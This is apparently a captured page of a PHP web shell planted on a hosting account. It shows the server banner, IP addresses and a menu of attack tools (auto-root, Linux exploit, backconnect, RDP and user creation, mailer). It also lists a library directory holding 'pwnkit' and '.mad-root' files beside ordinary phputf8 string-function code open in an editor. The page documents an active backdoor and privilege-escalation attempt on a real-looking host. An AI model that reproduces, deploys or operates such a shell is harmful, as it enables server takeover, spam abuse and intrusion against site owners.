Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
phputf8 /
[ HOME SHELL ]
Name
Size
Permission
Action
mbstring
[ DIR ]
drwxr-xr-x
native
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
25.81
KB
-rw-r--r--
README
3.29
KB
-rw-r--r--
ord.php
2.35
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
str_ireplace.php
1.95
KB
-rw-r--r--
str_pad.php
1.67
KB
-rw-r--r--
str_split.php
824
B
-rw-r--r--
strcasecmp.php
546
B
-rw-r--r--
strcspn.php
894
B
-rw-r--r--
stristr.php
855
B
-rw-r--r--
strrev.php
458
B
-rw-r--r--
strspn.php
923
B
-rw-r--r--
substr_replace.php
600
B
-rw-r--r--
trim.php
2.18
KB
-rw-r--r--
ucfirst.php
787
B
-rw-r--r--
ucwords.php
1.44
KB
-rw-r--r--
utf8.php
2.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : str_pad.php
<?php /** * @version $Id$ * @package utf8 * @subpackage strings */ //--------------------------------------------------------------- /** * Replacement for str_pad. $padStr may contain multi-byte characters. * * @author Oliver Saunders <oliver (a) osinternetservices.com> * @param string $input * @param int $length * @param string $padStr * @param int $type ( same constants as str_pad ) * @return string * @see http://www.php.net/str_pad * @see utf8_substr * @package utf8 * @subpackage strings */ function utf8_str_pad($input, $length, $padStr = ' ', $type = STR_PAD_RIGHT) { $inputLen = utf8_strlen($input); if ($length <= $inputLen) { return $input; } $padStrLen = utf8_strlen($padStr); $padLen = $length - $inputLen; if ($type == STR_PAD_RIGHT) { $repeatTimes = ceil($padLen / $padStrLen); return utf8_substr($input . str_repeat($padStr, $repeatTimes), 0, $length); } if ($type == STR_PAD_LEFT) { $repeatTimes = ceil($padLen / $padStrLen); return utf8_substr(str_repeat($padStr, $repeatTimes), 0, floor($padLen)) . $input; } if ($type == STR_PAD_BOTH) { $padLen/= 2; $padAmountLeft = floor($padLen); $padAmountRight = ceil($padLen); $repeatTimesLeft = ceil($padAmountLeft / $padStrLen); $repeatTimesRight = ceil($padAmountRight / $padStrLen); $paddingLeft = utf8_substr(str_repeat($padStr, $repeatTimesLeft), 0, $padAmountLeft); $paddingRight = utf8_substr(str_repeat($padStr, $repeatTimesRight), 0, $padAmountLeft); return $paddingLeft . $input . $paddingRight; } trigger_error('utf8_str_pad: Unknown padding type (' . $type . ')',E_USER_ERROR); }
Close